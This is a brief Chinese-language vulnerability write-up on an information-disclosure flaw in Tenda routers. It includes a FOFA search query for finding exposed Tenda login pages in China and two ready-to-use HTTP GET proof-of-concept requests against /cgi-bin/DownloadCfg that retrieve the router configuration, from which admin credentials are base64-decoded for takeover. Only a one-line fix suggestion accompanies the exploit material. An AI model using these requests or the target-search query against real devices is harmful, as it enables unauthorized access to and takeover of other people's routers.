Bootstrap

Tenda路由器 敏感信息泄露

0x01 产品描述:

        Tenda路由器‌是由深圳市吉祥腾达科技有限公司(Tenda)生产的一系列网络通信产品。Tenda路由器以其高性能、高性价比和广泛的应用场景而闻名,适合家庭、办公室和各种网络环境。
0x02 漏洞描述:

        Tenda路由器 /cgi-bin/DownloadCfg接口处存在信息泄露漏洞,攻击者可通过此漏洞获取路由器后台账号密码。经过base64解码后可登录目标系统从而实现接管。
0x03 搜索语句:

Fofa:title="Tenda | LOGIN" && country="CN"


0x04 漏洞复现:

问题接口:

/cgi-bin/DownloadCfg/RouterCfm.jpg
/cgi-bin/DownloadCfg.jpg

poc1:

GET /cgi-bin/DownloadCfg/RouterCfm.jpg HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

 

poc2: 

GET /cgi-bin/DownloadCfg.jpg HTTP/1.1
Content-Type: application/json
Host: your-ip


0x05 修复建议:

接口加上权限,且如非必要系统请勿暴露在互联网端。

;